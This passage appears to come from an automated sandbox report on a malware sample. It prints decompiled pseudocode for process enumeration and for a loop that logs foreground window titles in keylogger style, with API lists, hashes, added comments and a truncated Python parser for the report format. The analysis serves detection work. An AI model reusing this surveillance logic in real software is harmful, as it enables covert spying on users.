                      						__eflags = _t47 - 0xffff5740;
                      						if(_t47 < 0xffff5740) {
                      							goto L10;
                      						}
                      						goto L7;
                      					}
                      					_t69 = E0077A504();
                      					_t102 = 0x16;
                      					 *_t69 = _t102;
                      					E0077695D();
                      					goto L11;
                      				}
                      				_t71 = E0077A504();
                      				_t103 = 0x16;
                      				 *_t71 = _t103;
                      				E0077695D();
                      				return _t103;
                      			}

                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a5f0b8630abf222cd55643df63d4f856d02f5b2c3e502f0e150ca2a2639076ff
                      • Instruction ID: 23f5f4f8a28b6da7aaeb1f0951d05fcd3ec0fefd5e09419fefc4857590a25993
                      • Opcode Fuzzy Hash: a5f0b8630abf222cd55643df63d4f856d02f5b2c3e502f0e150ca2a2639076ff
                      • Instruction Fuzzy Hash: 08410A72600744EFEF259F38CC45B6A7BE9EB88750F20C52EF119DB281D77AA9118780
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E00744CAB(void* __ecx, void* __edx, intOrPtr _a4, _Unknown_base(*)()* _a8, char _a12) {
                      				signed int _v12;
                      				signed int _v16;
                      				void* _v20;
                      				char _v44;
                      				char _v68;
                      				void* __ebx;
                      				void* __esi;
                      				void* _t41;
                      				signed int _t46;
                      				void* _t70;
                      				void* _t73;
                      				void* _t74;
                      				struct _SECURITY_ATTRIBUTES* _t77;
                      				void* _t101;
                      				intOrPtr _t103;
                      				void* _t105;
                      				void* _t106;
                      				void* _t107;
                      
                      				_t101 = __edx;
                      				_v12 = _v12 & 0x00000000;
                      				_t105 = __ecx;
                      				_v20 = __ecx;
                      				 *(__ecx + 0x48) =  *(__ecx + 0x48) & 0x00000000;
                      				E007420D5(_t74,  &_v44);
                      				_t103 = _a4;
                      				_t8 = _t105 + 0x4c; // 0x7ac184
                      				_t41 = _t8;
                      				while(E00744E51(_t105, E00741F95(_t103),  &_v12, _t41) != 0) {
                      					_t10 = _t105 + 0x40; // 0x8
                      					_t46 =  *_t10 & 0x000000ff;
                      					_v16 = _t46;
                      					if(_v12 + _t46 <= E00742489()) {
                      						_t77 = 0;
                      						__eflags = 0;
                      					} else {
                      						_t77 = 1;
                      						_t73 = E00742489();
                      						_t105 = _v20;
                      						_t103 = _a4;
                      						 *((intOrPtr*)(_t105 + 0x48)) = _v16 + _v12 - _t73;
                      					}
                      					if(_t77 == 0) {
                      						_t78 = _v16;
                      						E00741FD1( &_v44, _t101, _t105, E007442A6(_t103,  &_v68, _v16, 0xffffffff));
                      						E00741FC7();
                      						E00741FD1( &_v44, _t101, _t105, E007442A6( &_v44,  &_v68, 0, _v12));
                      						E00741FC7();
                      						_t112 = _a12;
                      						if(_a12 != 0) {
                      							_t30 = _t105 + 0x1c; // 0x7ac154
                      							E00741FAD(_t30,  &_v44);
                      							 *(_t105 + 0x34) = CreateEventA(0, 0, 0, 0);
                      							__eflags = 0;
                      							CreateThread(0, 0, _a8, _t105, 0, 0);
                      							_t33 = _t105 + 0x34; // 0x0
                      							WaitForSingleObject( *_t33, 0xffffffff);
                      							_t34 = _t105 + 0x34; // 0x0
                      							CloseHandle( *_t34);
                      						} else {
                      							_t107 = _t106 - 0x18;
                      							E007420EC(_t78, _t107, _t101, _t112,  &_v44);
                      							_a8(_t105);
                      							_t106 = _t107 + 0x1c;
                      						}
                      						E00741FD1(_t103, _t101, _t105, E007442A6(_t103,  &_v68, _v12 + _t78, 0xffffffff));
                      						E00741FC7();
                      						_t70 = E00742489();
                      						_t38 = _t105 + 0x4c; // 0x7ac184
                      						_t41 = _t38;
                      						if(_t70 != 0) {
                      							continue;
                      						}
                      					}
                      					break;
                      				}
                      				return E00741FC7();
                      			}

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,007AC184), ref: 00744D98
                      • CreateThread.KERNEL32 ref: 00744DAB
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00744C44,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00744DB6
                      • CloseHandle.KERNEL32(00000000,?,?,00744C44,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00744DBF
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                      • String ID:
                      • API String ID: 3360349984-0
                      • Opcode ID: cef5056d676ebe85466f419b7f3c685c513ede8901bcadc36279c2da370a02d8
                      • Instruction ID: 7998ad13909f65e0d6f135be910772a8c2b98a536097372087232c8e6777143c
                      • Opcode Fuzzy Hash: cef5056d676ebe85466f419b7f3c685c513ede8901bcadc36279c2da370a02d8
                      • Instruction Fuzzy Hash: 58414171A00118EFCB10EBA4CC59AFEBBBDFF45320F444519F552A3291DB386A46DB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0074D211(void* __ebx, void* __ecx, void* __eflags) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				char _v148;
                      				char _v172;
                      				char _v196;
                      				char _v220;
                      				char _v244;
                      				char _v268;
                      				char _v292;
                      				char _v316;
                      				char _v340;
                      				char _v864;
                      				intOrPtr _v892;
                      				void* _v900;
                      				void* __edi;
                      				void* __esi;
                      				void* _t47;
                      				void* _t48;
                      				void* _t50;
                      				void* _t129;
                      				void* _t130;
                      
                      				_t77 = __ecx;
                      				_t76 = __ebx;
                      				_t129 = __ecx;
                      				E007420D5(__ebx, __ecx);
                      				 *0x7abeb4 = E00757614(_t77);
                      				_t130 = CreateToolhelp32Snapshot(2, 0);
                      				if(_t130 != 0) {
                      					_v900 = 0x22c;
                      					Process32FirstW(_t130,  &_v900);
                      					while(Process32NextW(_t130,  &_v900) != 0) {
                      						E0074427F(_t76,  &_v28,  &_v864);
                      						_t47 = E00757226(_t76,  &_v340, E00757642(_v892) & 0x000000ff);
                      						_t48 = E00757226(_t76,  &_v316, _v892);
                      						_t50 = E0075739C(_t76,  &_v268, E00757678( &_v292, _v892));
                      						E00741FD1(_t129, _t58, _t130, E00745343(_t76,  &_v52, E00742F1D( &_v76, E00745343(_t76,  &_v100, E00742F1D( &_v124, E00745343(_t76,  &_v148, E00742F1D( &_v172, E00745343(_t76,  &_v196, E007474F0(_t76,  &_v220, _t129, __eflags, E0075739C(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x7a061c), _t50), _t129, __eflags, 0x7a061c), _t48), _t129, __eflags, 0x7a061c), _t47), _t129, __eflags, "|"));
                      						E00741FC7();
                      						E00741FC7();
                      						E00741FC7();
                      						E00741FC7();
                      						E00741FC7();
                      						E00741FC7();
                      						E00741FC7();
                      						E00741FC7();
                      						E00741FC7();
                      						E00741FC7();
                      						E00741EF0();
                      						E00741FC7();
                      						E00741FC7();
                      						E00741EF0();
                      					}
                      					CloseHandle(_t130);
                      				}
                      				return _t129;
                      			}

                      APIs
                        • Part of subcall function 00757614: GetCurrentProcess.KERNEL32(?,?,?,007580D1,WinDir,00000000,00000000), ref: 00757625
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0074D231
                      • Process32FirstW.KERNEL32(00000000,?), ref: 0074D253
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0074D3DA
                      • CloseHandle.KERNEL32(00000000), ref: 0074D3E9
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                      • String ID:
                      • API String ID: 592884611-0
                      • Opcode ID: 3ca6562c5a2c95f4d8d5ee9b37166b83eb05aef8edf2595b2938f80ac73cb848
                      • Instruction ID: bcf430d4d790f0f29601ec0daf0f8c74a6e7ec8fb74456f908e1ef9b248ce72b
                      • Opcode Fuzzy Hash: 3ca6562c5a2c95f4d8d5ee9b37166b83eb05aef8edf2595b2938f80ac73cb848
                      • Instruction Fuzzy Hash: E1413A31905618DBCB19FB64DC5AAEDB375BF55300F8041A9B40AA7092EF785FCACE90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E00748A51() {
                      				char _v2004;
                      				char _v2012;
                      				char _v2028;
                      				void* _v2036;
                      				char _v2056;
                      				void* _v2060;
                      				char _v2080;
                      				void* _v2084;
                      				void* _t15;
                      				signed int _t17;
                      				void* _t30;
                      				void* _t32;
                      				void* _t34;
                      				void* _t35;
                      				void* _t59;
                      				void* _t61;
                      				signed int _t62;
                      				signed int _t63;
                      				void* _t64;
                      				void* _t65;
                      				void* _t66;
                      				void* _t67;
                      				void* _t68;
                      
                      				_t63 = _t62 & 0xfffffff8;
                      				_t69 = _t63;
                      				_t64 = _t63 - 0x81c;
                      				_push(_t34);
                      				_t59 = Sleep;
                      				_t61 = _t35;
                      				while(1) {
                      					E00771F00(_t59,  &_v2004, 0, 0x7d0);
                      					_t65 = _t64 + 0xc;
                      					while(1) {
                      						_t15 = E00741F95(E00741E49(0x7ac578, _t56, _t69, 0x2a));
                      						_t66 = _t65 - 0x18;
                      						E0074427F(_t34, _t66, _t15);
                      						_t17 = E00757ABF( &_v2012, _t56);
                      						_t65 = _t66 + 0x18;
                      						_t69 = _t17;
                      						if(_t17 != 0) {
                      							break;
                      						}
                      						Sleep(0x1f4);
                      					}
                      					_t56 = E00744405(_t34,  &_v2056, L"\r\n[ ", __eflags, E0074427F(_t34,  &_v2028,  &_v2004));
                      					E00741EFA(_t61 + 4, _t20, _t61, E007430A6(_t34,  &_v2080, _t20, _t59, __eflags, L" ]\r\n"));
                      					E00741EF0();
                      					E00741EF0();
                      					E00741EF0();
                      					_t67 = _t65 - 0x18;
                      					E00747350(_t34, _t67, _t56, __eflags, _t61 + 0x60);
                      					E00748742(_t61);
                      					while(1) {
                      						_t30 = E00741F95(E00741E49(0x7ac578, _t56, __eflags, 0x2a));
                      						_t68 = _t67 - 0x18;
                      						E0074427F(_t34, _t68, _t30);
                      						_t32 = E00757ABF(0, _t56);
                      						_t64 = _t68 + 0x18;
                      						__eflags = _t32;
                      						if(__eflags == 0) {
                      							break;
                      						}
                      						Sleep(0x64);
                      					}
                      					E007495A9(_t34, _t61);
                      				}
                      			}

                      APIs
                        • Part of subcall function 00757ABF: GetForegroundWindow.USER32(75146490,?), ref: 00757ACF
                        • Part of subcall function 00757ABF: GetWindowTextLengthW.USER32(00000000), ref: 00757AD8
                        • Part of subcall function 00757ABF: GetWindowTextW.USER32 ref: 00757B02
                      • Sleep.KERNEL32(000001F4), ref: 00748AAF
                      • Sleep.KERNEL32(00000064), ref: 00748B49
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Window$SleepText$ForegroundLength
                      • String ID: [ $ ]
                      • API String ID: 3309952895-93608704
                      • Opcode ID: 1a7bd13c4a743fa8f559b387d34be6c2e5df846a4a750d16bbf17c6534a4173b
                      • Instruction ID: c1fb35ae0d55b7e426a69ba70a253c580b2e3c888258ca80c831e94c141376f8
                      • Opcode Fuzzy Hash: 1a7bd13c4a743fa8f559b387d34be6c2e5df846a4a750d16bbf17c6534a4173b
                      • Instruction Fuzzy Hash: 5F21F571A44204EBC608F778DC1FA6F7299AF91740F90452DFA42571D2EF6CAA098693
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E0077D288(signed int __eax, void* __ecx) {
                      				signed int _t2;
                      				signed int _t3;
                      				int _t10;
                      				int _t11;
                      				void* _t13;
                      				short** _t16;
                      				char* _t19;
                      				void* _t20;
                      
                      				_t13 = __ecx;
                      				_t16 =  *0x7ab4d4; // 0x0
                      				if(_t16 != 0) {
                      					_t10 = 0;
                      					while( *_t16 != _t10) {
                      						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
                      						_t11 = _t2;
                      						if(_t11 == 0) {
                      							L11:
                      							_t3 = _t2 | 0xffffffff;
                      						} else {
                      							_t19 = E0077F348(_t13, _t11, 1);
                      							_pop(_t13);
                      							if(_t19 == 0) {
                      								L10:
                      								_t2 = E007801F5(_t19);
                      								goto L11;
                      							} else {
                      								_t10 = 0;
                      								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
                      									goto L10;
                      								} else {
                      									_push(0);
                      									_push(_t19);
                      									E00787D3F();
                      									E007801F5(0);
                      									_t20 = _t20 + 0xc;
                      									_t16 =  &(_t16[1]);
                      									continue;
                      								}
                      							}
                      						}
                      						L9:
                      						return _t3;
                      						goto L12;
                      					}
                      					_t3 = 0;
                      					goto L9;
                      				} else {
                      					return __eax | 0xffffffff;
                      				}
                      				L12:
                      			}

                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 91946935c1da159d4adbfaee391b09a4f1aefb74ea468d857239e070b3a8a1cf
                      • Instruction ID: dd4b152d5932f248a396971d7525cef880c547078a2b3b6950f077d1c89faaff
                      • Opcode Fuzzy Hash: 91946935c1da159d4adbfaee391b09a4f1aefb74ea468d857239e070b3a8a1cf
                      • Instruction Fuzzy Hash: FD01A2B2709216BEEA3126786CC5F7B272DEF813F4B348725F525611D6DE6CCC024260
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E0077D307(signed int __eax, void* __ecx) {
                      				signed int _t2;
                      				signed int _t3;
                      				int _t10;
                      				int _t11;
                      				void* _t13;
                      				char** _t16;
                      				short* _t19;
                      				void* _t20;
                      
                      				_t13 = __ecx;
                      				_t16 =  *0x7ab4d0; // 0x2d19f60
                      				if(_t16 != 0) {
                      					_t10 = 0;
                      					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10); // _t10 == 0: CP_ACP, NUL-terminated input, NULL output buffer, i.e. a size query in wide chars
                      						_t11 = _t2;
                      						if(_t11 == 0) {
                      							L11:
                      							_t3 = _t2 | 0xffffffff;
                      						} else {
							_t19 = E0077F348(_t13, _t11, 2); // allocate the wide buffer (_t11 elements of 2 bytes)
                      							_pop(_t13);
                      							if(_t19 == 0) {
                      								L10:
                      								_t2 = E007801F5(_t19);
                      								goto L11;
                      							} else {
                      								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) { // second call converts into the buffer sized by the first
                      									goto L10;
                      								} else {
                      									_push(0);
                      									_push(_t19);
                      									E00787D4A(_t13);
                      									E007801F5(0);
                      									_t20 = _t20 + 0xc;
                      									_t16 =  &(_t16[1]);
                      									continue;
                      								}
                      							}
                      						}
                      						L9:
                      						return _t3;
                      						goto L12;
                      					}
                      					_t3 = 0;
                      					goto L9;
                      				} else {
                      					return __eax | 0xffffffff;
                      				}
                      				L12:
                      			}
                      Statement addresses (address column of the listing above): 0x0077d307 to 0x0077d37b

                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dbb929a9189007cd15df14c64e51c026c7cfbd3d1bb655651aeea4687864985d
                      • Instruction ID: f4270c9b8d2af3c0fc51cd6f3a615a59a25e9196d8e4241844e275ee8620e72b
                      • Opcode Fuzzy Hash: dbb929a9189007cd15df14c64e51c026c7cfbd3d1bb655651aeea4687864985d
                      • Instruction Fuzzy Hash: 1F01A9B260AA16FEEB2126786CC5D2B672DEF923F83318725F539521D1DB3CCC014165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E00748BC0(void* __ecx, void* __edx) {
                      				void* __ebx;
                      				signed int _t8;
                      				int _t9;
                      				long _t14;
                      				void* _t22;
                      				void* _t23;
                      				void* _t24;
                      				void* _t25;
                      				void* _t30;
                      
                      				_t22 = __edx;
                      				_t8 =  *0x7ac3f8; // 0x0
                      				_t9 = _t8 |  *0x7ac3fc;
                      				_t24 = __ecx;
                      				if(_t9 != 0) {
                      					 *((char*)(__ecx + 0x39)) = 0;
                      					do {
						_t9 = CreateFileW(E00741EEB(0x7ac3b0), 0x80000000, 7, 0, 3, 0x80, 0); // GENERIC_READ, FILE_SHARE_READ|WRITE|DELETE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
                      						_t23 = _t9;
                      						if(_t23 == 0xffffffff) {
                      							 *((char*)(_t24 + 0x39)) = 0;
                      						} else {
							_t14 = GetFileSize(_t23, 0); // lpFileSizeHigh == NULL: only the low 32 bits of the size
							_t30 = 0 -  *0x7ac3fc; // 0x0
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x7ac3f8)) { // 64-bit compare of (0:_t14) against the threshold (*0x7ac3fc : *0x7ac3f8)
                      								 *((char*)(_t24 + 0x39)) = 1;
                      								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
                      									E007495A9(0, _t24);
                      								}
								Sleep(0x2710); // 10000 ms, then the file is reopened and checked again
                      							}
                      							_t9 = CloseHandle(_t23);
                      						}
                      					} while ( *((char*)(_t24 + 0x39)) == 1);
                      					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
                      						_t35 =  *0x7aa9d4 - 0x31;
                      						if( *0x7aa9d4 == 0x31) {
                      							E00747350(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
                      							return E00748742(_t24);
                      						}
                      					}
                      				}
                      				return _t9;
                      			}
                      Statement addresses (address column of the listing above): 0x00748bc0 to 0x00748c70

                      APIs
                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00748C97), ref: 00748BF6
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00748C97), ref: 00748C05
                      • Sleep.KERNEL32(00002710,?,?,?,00748C97), ref: 00748C32
                      • CloseHandle.KERNEL32(00000000,?,?,?,00748C97), ref: 00748C39
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSizeSleep
                      • String ID:
                      • API String ID: 1958988193-0
                      • Opcode ID: febd11fae708b8660301c603dd1dc0a747325779f1029eecc7042f9b705d8264
                      • Instruction ID: e5ecbe684a997b6c74ca9ff72620d96094484fb35988fe8371d1ce85a8792057
                      • Opcode Fuzzy Hash: febd11fae708b8660301c603dd1dc0a747325779f1029eecc7042f9b705d8264
                      • Instruction Fuzzy Hash: 3A117A302023447FDF72AB2498C8A2F7A9FEB82700F048849E28156182CB2D9841837B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00782033(signed int _a4) {
                      				signed int _t9;
                      				void* _t13;
                      				signed int _t15;
                      				WCHAR* _t22;
                      				signed int _t24;
                      				signed int* _t25;
                      				void* _t27;
                      
                      				_t9 = _a4;
                      				_t25 = 0x7ab658 + _t9 * 4;
                      				_t24 =  *_t25;
                      				if(_t24 == 0) {
                      					_t22 =  *(0x798b78 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800); // 0x800 = LOAD_LIBRARY_SEARCH_SYSTEM32
                      					if(_t27 != 0) {
                      						L8:
                      						 *_t25 = _t27;
                      						if( *_t25 != 0) {
                      							FreeLibrary(_t27);
                      						}
                      						_t13 = _t27;
                      						L11:
                      						return _t13;
                      					}
					_t15 = GetLastError();
					if(_t15 != 0x57) { // 0x57 = ERROR_INVALID_PARAMETER: the search flag is unknown to this OS
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27); // _t27 is 0 here: retry with flags 0, i.e. the default DLL search order
						_t27 = _t15;
					}
                      					if(_t27 != 0) {
                      						goto L8;
                      					} else {
                      						 *_t25 = _t15 | 0xffffffff;
                      						_t13 = 0;
                      						goto L11;
                      					}
                      				}
                      				_t4 = _t24 + 1; // 0x67a7e35f
                      				asm("sbb eax, eax");
                      				return  ~_t4 & _t24;
                      			}
                      Statement addresses (address column of the listing above): 0x00782038 to 0x007820aa

                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00781FDA,?,00000000,00000000,00000000,?,00782306,00000006,FlsSetValue), ref: 00782065
                      • GetLastError.KERNEL32(?,00781FDA,?,00000000,00000000,00000000,?,00782306,00000006,FlsSetValue,00799068,00799070,00000000,00000364,?,00781DB4), ref: 00782071
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00781FDA,?,00000000,00000000,00000000,?,00782306,00000006,FlsSetValue,00799068,00799070,00000000), ref: 0078207F
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: 2b1a33babfecbbed95a09519ef87f50056c9cf8269f3aee32629f6a47d32095f
                      • Instruction ID: a4fbf24c8eff979eec8ede1a0a244a7a1e27e4a02a3558d71272734f24ed2288
                      • Opcode Fuzzy Hash: 2b1a33babfecbbed95a09519ef87f50056c9cf8269f3aee32629f6a47d32095f
                      • Instruction Fuzzy Hash: 00012B32781227ABC7315B79DC449677B98EF45B62B204621FA07D7252CB2CD803C7E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E007579DC(WCHAR* __ecx, intOrPtr __edx) {
                      				intOrPtr _v8;
                      				long _v12;
                      				void* __ebx;
                      				void* __edi;
                      				struct _OVERLAPPED* _t13;
                      				struct _OVERLAPPED* _t15;
                      				void* _t22;
                      				long _t25;
                      
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t15 = 0;
                      				_v8 = __edx;
				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0); // GENERIC_READ, FILE_SHARE_READ|WRITE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
                      				if(_t22 != 0xffffffff) {
                      					_t25 = GetFileSize(_t22, 0);
                      					E00742459(0, _v8, _t22, _t25, 0);
                      					_v12 = 0;
                      					if(ReadFile(_t22, E00741F95(_v8), _t25,  &_v12, 0) != 0) {
                      						_t15 = 1;
                      					}
                      					CloseHandle(_t22);
                      					_t13 = _t15;
                      				} else {
                      					_t13 = 0;
                      				}
                      				return _t13;
                      			}
                      Statement addresses (address column of the listing above): 0x007579df to 0x00757a4d

                      APIs
                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 007579F9
                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 00757A0D
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 00757A32
                      • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00744230,0079F464), ref: 00757A40
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleReadSize
                      • String ID:
                      • API String ID: 3919263394-0
                      • Opcode ID: b0938465ca4da2a9a2d238b9d1c5ba8aecc497851a2f0e7005d8eee3f6f9b767
                      • Instruction ID: 9fd9f00c6afca815f7570c262e9059e4866d97edff76c763416a54f18be7231b
                      • Opcode Fuzzy Hash: b0938465ca4da2a9a2d238b9d1c5ba8aecc497851a2f0e7005d8eee3f6f9b767
                      • Instruction Fuzzy Hash: DD01F4B0501108BFE7146B65ACC9EFF7B6CEB46365F10415AFD00A3280DB785F069670
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00771D01() {
                      				void* _t4;
                      				void* _t8;
                      
                      				E00774F41();
                      				E00771C95();
                      				if(E00775195() != 0) {
                      					_t4 = E00775147(_t8, __eflags);
                      					__eflags = _t4;
                      					if(_t4 != 0) {
                      						return 1;
                      					} else {
                      						E007751D1();
                      						goto L1;
                      					}
                      				} else {
                      					L1:
                      					return 0;
                      				}
                      			}
                      Statement addresses (address column of the listing above): 0x00771d01 to 0x00771d29

                      APIs
                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00771D01
                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00771D06
                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00771D0B
                        • Part of subcall function 00775195: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 007751A6
                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00771D20
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                      • String ID:
                      • API String ID: 1761009282-0
                      • Opcode ID: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
                      • Instruction ID: 2f1d40195d62f119ab4d10a99d8b5c65e49ab5c7af0f2bab26d9affd0eac02ec
                      • Opcode Fuzzy Hash: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
                      • Instruction Fuzzy Hash: 14C04C18244A89D01C3037BC121F3BD03155CA33C6BE3D4C1A96D1B403AF4D080B6B72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 0078007D
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorHandling__start
                      • String ID: pow
                      • API String ID: 3213639722-2276729525
                      • Opcode ID: 9b9f3cf8fa5a0c10a6da0588d566c60d34f46d4dfaace587e65c5ade87758777
                      • Instruction ID: 1aaae15a58e374b46bb70f676e0a206055070dcce0e7f33349cc9f32b77e0592
                      • Opcode Fuzzy Hash: 9b9f3cf8fa5a0c10a6da0588d566c60d34f46d4dfaace587e65c5ade87758777
                      • Instruction Fuzzy Hash: FC516D61A89205D6CB537B24CD1536E3B90EB40710F208D69F0D5822A9EB3D8C9D9BF7
                      Uniqueness

                      Uniqueness Score: -1.00%
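The "API ID" that heads each Similarity block above (File$CloseCreateHandleSizeSleep for E00748BC0, File$CloseCreateHandleReadSize for E007579DC, LibraryLoad$ErrorLast for E00782033, the long ___vcrt_ string for E00771D01, ErrorHandling__start for the pow record) can be rebuilt from that record's "APIs" lines. The Python below is an added example, not part of this report and not Joe Sandbox's code: it parses APIs lines in the layout shown above (the sample is the four lines of the E00748BC0 record, copied here as constructed input) into call records, decodes the Sleep argument 00002710 to milliseconds, and reconstructs the API ID by a rule that is an inference from the records on this page (drop tokens of three characters or fewer, put repeated tokens first followed by "$", sort the rest); the rule reproduces all five IDs above but is an assumption about the tool, not its documented definition.

```python
import re
from collections import Counter
from typing import Iterable, List, NamedTuple, Optional, Tuple

# Constructed sample input: the four "APIs" lines of the E00748BC0 record above,
# copied in the report's own "Name.MODULE(args), ref: offset" layout.
SAMPLE_APIS = """\
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00748C97), ref: 00748BF6
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00748C97), ref: 00748C05
• Sleep.KERNEL32(00002710,?,?,?,00748C97), ref: 00748C32
• CloseHandle.KERNEL32(00000000,?,?,?,00748C97), ref: 00748C39
"""


class ApiCall(NamedTuple):
    name: str                  # imported function, e.g. "CreateFileW"
    module: str                # exporting module as the report spells it, e.g. "KERNEL32"
    args: Tuple[str, ...]      # argument column as written: hex words, "?" for unknown, or a string
    ref: Optional[int]         # call-site address from "ref:", or None
    subcall_of: Optional[int]  # set for "Part of subcall function X:" entries


# One bullet line: optional subcall prefix, Name.MODULE, optional (args), optional ref: offset.
_API_LINE = re.compile(
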